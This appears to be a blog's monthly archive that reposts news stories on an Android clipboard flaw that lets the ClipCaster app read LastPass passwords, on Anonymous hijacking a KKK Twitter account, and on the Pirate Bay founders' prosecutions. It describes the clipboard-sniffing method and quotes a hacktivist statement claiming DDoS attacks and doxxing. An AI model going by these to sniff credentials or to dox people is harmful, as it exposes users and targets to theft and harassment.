Monthly Archives: November 2014

Blogs I Follow — WordPress.com

In early 2013, researchers exposed some unsettling risks stemming from Android-based password managers. In a paper titled “Hey, You, Get Off of My Clipboard,” they documented how passwords managed by 21 of the most popular such apps could be accessed by any other app on an Android device, even those with extremely low-level privileges. They suggested several measures to help fix the problem.

Almost two years later, the threat remains viable in at least some, if not all, of the apps originally analyzed. An app recently made available on Google Play, for instance, has no trouble divining the passwords managed by LastPass, one of the leading managers on the market, as well as the lesser-known KeePassDroid. With additional work, it’s likely that the proof-of-concept ClipCaster app would work seamlessly against many other managers, too, said Xiao Bao Clark, the Australia-based programmer who developed it. While ClipCaster does nothing more than display the plaintext of passwords that LastPass and KeePassDroid funnel through Android handsets, a malicious app with only network privileges could send the credentials to an attacker without the user having any idea what was happening.

“Besides the insecurity of it, what annoyed me was that I was never told any of this while I was signing up or setting up the LastPass app,” Clark wrote in an e-mail. “Instead, I got the strong impression from LastPass that everything was very secure, and I needn’t worry about any of it. If they at least told users the security issues using these features brings, then the users themselves could decide on their own trade-off between usability and security. Not mentioning it at all strikes me as disingenuous.”

Asked if LastPass has ever notified users of the risk, company CEO Joe Siegrist didn’t give a yes or no answer. Instead, he responded, “This is an any clipboard activity problem [his emphasis] and impacts any password manager involving the clipboard (100% of them)—the way all password managers have consistently allowed you to enter your password into other apps since Android has existed. This demonstration is aimed at LastPass, but it’s the whole of Android that must be addressed.”

Clark agreed that any Android-based password manager that uses the OS clipboard is susceptible. He strongly recommends that people stop using any app setup that works this way. Many apps use standalone browsers, browser extensions, or software keyboards to enter credentials into login fields. There is no evidence they are susceptible to sniffing. The reason ClipCaster takes special aim at LastPass, Clark said, is simple. It just happened to be the manager he installed on his phone. There are no reports that password managers running on iOS or Windows Phone are vulnerable. But there can be way to know for sure, since Ars is unaware of the any comprehensive study testing the security of managers on those platforms.

As already alluded, the threat stems from the use of the Android clipboard, which acts as a temporary cache for text that is being copied and pasted, either within the same app or from one app to another. Android has no official programming interface that secures the clipboard. By design, its contents are available to any app installed on the phone, from the highest privileged banking app to one with no privileges at all. (ClipCaster, for instance, requires no permissions.) Siegrist rightly noted that any password manager that makes use of the Android clipboard—and there are plenty, including LastPass—is vulnerable.

LastPass has several different methods for plucking passwords out of their highly fortified vault and plugging them into the password field of a browser or app. Not all of the options are susceptible to sniffing, but notably, the one LastPass recommends that Android users choose leaves them wide open. The option is known as autofill, a feature that seamlessly plugs passwords into apps and the Chrome browser.

Shortly after installing LastPass, Clark came across the 2013 paper that discussed the clipboard vulnerability. It got him wondering about the security of his decision, so he began analyzing the JavaScript autofill uses to populate username and password fields in Chrome. In about an hour, he had a crude but working exploit that monitored the Android clipboard and captured login credentials transported by autofill. His proof-of-concept app works by listening to the notices the clipboard broadcasts to installed apps and looking for a familiar patterns in the code.

Clark concocted a dummy account containing the username “j.doe@actisec.com” and the password “s4f3p4assw0rd,” and observed the way the credentials were funneled through the clipboard. Autofill wrote a blob of code to the clipboard and then pasted it into the address bar of Chrome. The code contained the following telltale lines:

if (l_bte) {
                l_sfv(l_bte, decodeURIComponent(escape(atob('ai5kb2VAYWN0aXNlYy5jb20='))));
            }
            l_sfv(l_bpe, decodeURIComponent(escape(atob('czRmZXBhc3N3MHJk'))));

An image of ClipCaster sniffing the password “s4f3p4assw0rd” as a user logs in to Facebook.
Xiao Bao Clark

“atob” is a JavaScript function for decoding strings that have been converted into base64-encoded representations. Presumably, LastPass developers chose the encoding to make it less obvious to other apps what the clipboard contents are. But to anyone with a modest amount of training, the measure is little more than an exercise in the largely discredited protection known as “security through obscurity.” ClipCaster monitors the clipboard for the patterns, decodes the base64 strings and, as illustrated in the image to the right, displays them.

In e-mails sent to Ars, Siegrist, the LastPass CEO, rightly noted that the vulnerability isn’t unique to his company’s product, or even to Android devices.

“This is an OS-level issue that impacts everything running on Android,” he said. “If you use the clipboard to copy any data, a malicious app could obtain it—like installing a clipboard monitoring software on Windows or a keylogger on Windows. You can compromise your security by installing bad software.”

Siegrist also noted that attacks like the one carried out by ClipCaster work only when LastPass or another password manager runs on an Android device that has a malicious app installed, and then only when the manager uses the device’s clipboard. The CEO said that LastPass users should run only “trusted” apps, meaning those distributed over Google Play by a trusted company and widely used and reviewed.

Still, his statements omit some important distinctions. First, LastPass on Windows doesn’t use the clipboard to pass login credentials to Chrome, and presumably other browsers, Clark’s research found. And second, most Windows users—and a growing number of Mac users as well—use antivirus protection to detect such threats. Android antivirus apps exist, but there’s little evidence that most users install one. Third, his advice about installing only trusted apps is sound, but given the regular occurrence of malicious apps that slip through Google defenses and are hosted in the company’s official Play Store, it’s unrealistic to expect end users to always spot rogue titles.

One of the key defenses of Android is its application sandbox, which prevents one app from accessing sensitive data belonging to another app, presumably under the premise that not all apps will be trustworthy. When an app as sensitive as a password manager doesn’t enjoy a protection as crucial as this, the companies should make this limitation explicit. LastPass and the developers of other vulnerable managers should be forthright about the risks and tell users what they can do to protect themselves. In the case of LastPass, the threat can be eliminated simply by opting out of the recommended autofill option and instead using the LastPass browser or LastPass keyboard. Many users may decide the convenience of autofill is worth the added risk, but at least they will be making an informed choice.

Advertisements

Dashboard ‹ The Network News — WordPress

Summery: On Nov 14, 2014, the online hacktivist Anonymous released a YouTube video announcing a cyber attack on Ku Klux Klan, (a White supremacist Christian group) due to its threats to use lethal force at the Ferguson protest. As a result, Anonymous has hacked the official Twitter account of KKK USA ().

After taking over the KKK’s twitter account, Anonymous made some tweets; bashing the group for ignoring previous warnings to stop interfering in Ferguson protest.

Here are some of the screenshots of some tweets posted by Anonymous from KKK’s twitter account.

anonymous-announces-opkkk-hacks-ku-klux-klan-twitter-account-over-ferguson-threats

anonymous-announces-opkkk-hacks-ku-klux-klan-twitter-account-over-ferguson-threats-2

This tweet was posted by KKK itself but that was just few hours before getting hacked by what they thought is ” a bunch of wannabes”. 

At the time of publishing this article, the KKK’s twitter account was hacked and still under the control of Anonymous. 

More about Operation KKK: 

Here is a press released sent by Anonymous to different media sources: 

KKK it has came to our unfortunate attention that you have been interfering with Anonymous. We are not attacking you because of what you believe in as we fight for freedom of speech… We are attacking you because of what you did to our brothers and sisters at the Ferguson protest on the 12th of November. Due to your actions we have started Operation KKK. The aim of our operation is nothing more than Cyber Warfare. Anything you upload will be taken down, anything you use to promote the KKK will beshut down. 
DDos attacks have already been sent and have infiltrated your servers over the past 2 days… d0x's have also been launched on leaders of the KKK. All information retrieved will be given to the public. You messed with our family and now we will mess with yours… Let the cyber war begin. We are legion. We do not forgive. We do not forget Ku Klux Klan you should haveexpect us.

Watch you YouTube video uploaded by Anonymous below: 

What is the Ferguson protest for?

On 9th August, 2014, a 17 yr old teen Mike Brown was shot dead by one of the officers from Ferguson Police Department. Anonymous conducted cyber attacks and on ground protests against the Ferguson Police Department under the banner of #OpFerguson. 

The grand jury investigation into the August 9 shooting of 18-year-old Michael Brown and Ferguson police officer Darren Wilson is expected to return a verdict in the next few days and according to the New York Times, protesters are already preparing for the decision.

This is not the first time when Anonymous has hacked a white supremacist group. In past, a Mississippi-based white supremacist organization The Nationalist Movement (nationalist.org)had its website hacked by Anons for #OpAntifa.

WordPress.com › Anmelden

Pirate Bay Is Still Online, Even Though All of Its Founders Are in Custody

November 7, 2014

The men behind the internet’s most popular piracy hub, the Pirate Bay, have had a particularly bad week, which is not too out of the ordinary for a group of hackers  who are acutely aware of law enforcement troubles, international manhunts, prison time, solitary confinement, and telling Hollywood to go fuck itself.

First there was the  ​Halloween sentencing of one of the Pirate Bay’s co-founders, 30 year-old Gottfrid Svartholm-Warg. He was sentenced to three-and-a-half years behind bars in Denmark. He was found guilty of hacking into the Danish wing of a company called the Computer Sciences Corporation. CSC is also in the news right now for allegedly developing billing fraud schemes, alongside the City of New York itself, that may have defrauded New York State’s Me​dicaid system. Across the pond, Svartholm was accused of hacking into CSC’s Danish databases, which a court in Copenhagen found to have included “criminal records and drive​rs’ license records.”

Svartholm-Warg had been previously hiding out in Cambodia, but was extradited to Sweden, where he was held in solitary confin​ement before facing trial in Denmark. Svartholm-Warg was running from a one-year prison sentence the Swedes hammered down on him for his role in founding the Pirate Bay. Those original Pirate Bay-related charges sparked a massive protest movement in Sweden.

I spoke to Rickard Falkvinge, the founder of the Pirate Party, about the legal nightmare of the Pirate Bay crew. On the subject of Svartholm-Warg’s extradition from Cambodia, he told me, “For some reason [the authorities] were throwing everything they had at a computer repair guy out in the rural parts of Cambodia, and it certainly had nothing to do with an extra 59.4 million US dollars in foreign aid from Sweden to Cambodia that was handed over at the same time.”

At the time, his extradition to Sweden caused plenty of undesirable attention for both the Swedes and the Cambodians. Within Wikileaks’ extensive documentation pertaining to Svartholm-Warg’s case, the Swedish Foreign Ministry’s press director is quoted as writ​ing: “We are getting a lot of questions from all four corners of the Earth regarding [Svartholm-Warg]. Many journalists are personally involved, is my impression. I think the pressure on the embassy [in Cambodia] will diminish now that he’s coming to Sweden.”

In Sweden, Svartholm-Warg faced similar hacking charges to the ones he was recently convicted for in Denmark. He was accused of both hacking into Nordea, a Swedish bank, and Logica, an IT firm. Only the charges pertaining to Logica stuck, but Svartholm-Warg has maintained his innocence throughout, stating that someone nefarious had accessed his computer remotely to carry out the hacks. Svartholm-Warg was then deported to Denmark, despite his b​es​t efforts, arguing that he was being tried for the same crimes twice. This is a perplexing argument given that the Danish charges pertained to his alleged hack of CSC, not Logica or Nordea, for which the Swedes went after him.

In Denmark, Svartholm-Warg used the same defense, namely that he was framed and his computer was hacked. The prosecution dismissed this argument, but Svartholm-Warg’s legal team called in Jacob Applebaum, noted computer security researcher and Tor developer who testified to the contrary. His ​lawyers also presented “an antivirus scan of his computer showing that 545 threats had been found on it, some of which were capable of providing a hacker with remote control of the computer.”

Svartholm-Warg’s argument is plausible, in that he has certainly made plenty of powerful enemies simply from running the Pirate Bay. Wikileaks has also pointed out that he played a role in the infamous “Collateral Murder” project, wherein Wikileaks released previously classified video footage of an American Apache helicopter mistakenly bombing ​jo​urnalists.

As if Svartholm-Warg’s multinational, convoluted legal woes weren’t enough, one of the other Pirate Bay founders, Fredrik Neij, who had fled to Asia after being charged in Sweden, was arrested in Thailand earlier th​is week. According to Falkvinge, “Fredrik had been one of the tech guys running the site, and according to clips from the movie TP​B AFK, he was basically planning to wait out the statute of limitations in the wonderful climate.”

Neij had been living in Laos, and reportedly was a frequent tra​veler to Thailand. While he has not yet been sent to Sweden to serve time for his copyright infringement charges, it’s expected that will be happening sooner than later. Neij was the last remaining Pirate Bay founder to evade incarceration.

The third founder of the Pirate Bay is Peter Sunde, a man Rickard Falkvinge describes as “mediagenic.” Sunde expects to be released from prison this month. Falkvinge told me Sunde’s role in the Pirate Bay was very minor, in a length​y statement written for Falkvinge’s blog published after his plea, he states his conviction came about after “having sent an invoice for advertising on the Pirate Bay once in April 2006 (almost a year after the events on trial started).”

He also claims he was advised by police to get a cheap lawyer, discusses how Stockholm Police’s “lead interrogator” on his case took a job with Warner Brothers during the trial, and how he once felt as if he were “the most hated person in the power corridors of Hollywood.”

Sunde is likely to take on new entrepreneurial projects upon his release. I spoke to him in July 2013, about an enc​rypted message app he was working on before being imprisoned that would combine the security of encryption with the beautiful graphic interface of, say, the iPhone.

The Guardian caught up​ with Sunde recently, where he discussed his newfound friendship with a cocaine smuggler who bakes vegan muffins, the poor treatment he receives in jail outside of said muffins, and how he was able to encrypt all of his computer systems through a keystroke on his smartphone at the moment of his arrest, which understandably infuriated his arresting officer.

Despite having its three most prominent organizers in custody (along with a fourth man—the supposed financier Carl Lundström, who currently sports an electronic ankle bracelet in Switzerland) the Pirate Bay is alive and well.

Yesterday, according to the Pirate Bay’s own statistics—which are published on its homepage—the torrent tracker had over 48 million connected users, sharing nearly 7 million torrents. In his post-plea statement from 2012, Sunde bragged that “The Pirate Bay was back online [immediately after the initial raid]. It’s an easy service to copy, and with no advanced functionality. That was one of the major features with the underlying technology, being smart and easily maintained to that level. It was so easy to maintain, nobody had practically touched it for a year at the time of the raid.”

According to Falkvinge, the four men’s “real crime was talking back at Hollywood monopolists, which embarrassed the Swedish establishment.”

In the face of international pressure, the Pirate Bay is infamous for its clever maneuvers that keep it online. At one point, the site’s administrators were considering placing its servers onto drones that would floa​t above international waters to curve anti-copyright legislation written in pesky landlocked nations. And, just recently, the site began using its a​dvertising space to promote a free VPN, which allow users in countries like Iceland (which have recently banned access to the Pirate Bay outright) to access the site safely.

​Follow Patrick on ​Twitter.